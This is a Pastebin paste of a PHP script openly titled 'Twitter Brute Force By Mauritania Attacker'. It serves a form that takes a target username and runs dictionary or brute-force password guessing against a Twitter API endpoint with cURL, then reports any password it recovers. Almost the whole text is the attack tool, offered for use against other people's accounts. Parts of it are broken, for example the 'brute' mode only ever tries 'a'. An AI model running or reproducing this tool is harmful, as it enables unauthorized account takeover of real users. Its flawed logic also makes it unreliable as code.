Advertisement
Guest User

[PHP] Twitter Brute Force

a guest
Nov 4th, 2013
6,704
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.16 KB | None
  1. <?php
  2. /////////////////////////////////////////////////////
  3. ////Twitter Brute Force By Mauritania Attacker//////
  4. ///////////////////////////////////////////////////
  5.  
  6. ///////////////////////////////////////////////////
  7. ////Changing Description won't make you the Coder/
  8. /////////////////////////////////////////////////
  9.  
  10.  
  11. ////////////////////////////////////////////////////////////////////////////
  12. # This script was created to Brute Force Twitter Logins,#
  13. #it Uses CURL and 2 Methods of Login attacks (Brute Force and Dictionary) #
  14. ///////////////////////////////////////////////////////////////////////////
  15.  
  16. $dic ="pass.txt";
  17. //////////////////////////////////////////////////////////////////////////
  18.  
  19.  
  20.  
  21. echo "
  22. <title>Twitter Brute Force By Mauritania Attacker</title>
  23. </head>
  24. <style type='text/css'>
  25. body {
  26.  
  27.  
  28. font:Verdana, Arial, Helvetica, sans-serif;
  29. font-size:12px;
  30. border-color:#FFFFFF;
  31. }
  32. .raster_table {
  33. background-color:BLUE;
  34. border-color:#CCCCCC;
  35. }
  36. .alert {
  37. color:#FF0000;
  38. }
  39. </style>
  40. <body>
  41. <table cellpadding='0' cellspacing='0' align='center' class='raster_table' width='75%'>
  42. <tr>
  43. <td>
  44. <div align='center'><b>Twitter Brute Force [PHP] By Mauritania Attacker</b></div>
  45. </td>
  46. </tr>
  47. </table>
  48. <table cellpadding='0' cellspacing='0' align='center' class='raster_table' width='75%'>
  49. <tr>
  50. <td>
  51. <div align='center'>
  52.  
  53. </div>
  54. </td>
  55. </tr>
  56. <tr>
  57. <td>
  58. <div align='center'>
  59.  
  60. </div>
  61. </td>
  62. </tr>
  63. <tr>
  64. <td>
  65. <div align='center'>
  66. <form method='post'>
  67. Target User:<br>
  68. <input name='username' type='text' /><br><br>
  69. <input name='attack' type='submit' value='dictionary' /> - <input name='attack' type='submit' value='brute' /><br>
  70. </form>
  71. </div>
  72. </td>
  73. </tr>
  74. <tr>
  75. <td>
  76. <div align='center'>
  77.  
  78. </div>
  79. </td>
  80. </tr>
  81. </table>
  82. ";
  83. // Sets variables and retrives twitter error for comparing
  84. if(isset($_POST['attack']) && isset($_POST['username'])) {
  85. $username = $_POST['username'];
  86. $headers = array(
  87. "Host: stream.twitter.com",
  88. "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:23.0) Gecko/20100101 Firefox/23.0",
  89. "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
  90. "Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3",
  91. "Accept-Encoding: text", # No gzip, it only clutters your code!
  92. "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7",
  93. "Date: ".date(DATE_RFC822)
  94. );
  95. $c = curl_init('https://stream.twitter.com/1/statuses/filter.json');
  96. curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // use authentication
  97. curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers
  98. curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // We need to fetch something from a string, so no direct output!
  99. curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // we get redirected, so follow
  100. curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0);
  101. curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1);
  102. curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // always stay authorised
  103. $wrong = curl_exec($c); // Get it
  104. curl_close($c); // Close the curl stream
  105. }
  106. //Dictionary Attack
  107. if($_POST['attack'] == "dictionary") {
  108. $Dictionary = file("$dic");
  109. for ($Position = 0; $Position < count($Dictionary); $Position++) {
  110. $Dictionary[$Position] = str_replace("rn", "", $Dictionary[$Position]);
  111. if(check_correct($username, $Dictionary[$Position])) {
  112. die("<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'>
  113. <tr>
  114. <td>
  115. <div align='center'><b>Found the password of: ".$Dictionary[$Position]."<br> For the account: ".$username."</b></div>
  116. </td>
  117. </tr>
  118. </table>
  119. </body>
  120. </html>");
  121. }
  122. }
  123. echo "<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'>
  124. <tr>
  125. <td>
  126. <div align='center'><b>Sorry... a password was not found for the account of <span class='alert'>".$username."</span> during the dictionar
  127. y attack.</b></div>
  128. </td>
  129. </tr>
  130. </table>";
  131. }
  132. //Brute Attack
  133. elseif($_POST['attack'] == "brute") {
  134. for ($Pass = 0; $Pass < 2; $Pass++) {
  135. if ($Pass == 0){$Pass = "a";} elseif ($Pass == 1){ $Pass = "a"; }
  136. if(check_correct($username, $Pass)) {
  137. die("<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'>
  138. <tr>
  139. <td>
  140. <div align='center'><b>Found the password of: ".$Dictionary[$Position]."<br> For the account: ".$username."</b></div>
  141. </td>
  142. </tr>
  143. </table>
  144. </body>
  145. </html>");
  146. }
  147. }
  148. echo "<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'>
  149. <tr>
  150. <td>
  151. <div align='center'><b>Sorry... a password was not found for the account of <span class='alert'>".$username."</span> during the brute for
  152. ce attack.</b></div>
  153. </td>
  154. </tr>
  155. </table>";
  156. }
  157. echo "</body>
  158. </html>";
  159. // Function for checking whether the username and password are correct
  160. function check_correct($username, $password)
  161. {
  162. global $wrong, $headers;
  163. $c = curl_init('https://'.$username.':'.$password.'@stream.twitter.com/1/statuses/filter.json');
  164. curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // use authentication
  165. curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers
  166. curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // We need to fetch something from a string, so no direct output!
  167. curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // we get redirected, so follow
  168. curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0);
  169. curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1);
  170. curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // always stay authorised
  171. $str = curl_exec($c); // Get it
  172. curl_close($c);
  173. if($str != $wrong) {return true;}
  174. else {return false;}
  175. }
  176.  
  177. ?>
Advertisement
RAW Paste Data Copied
Advertisement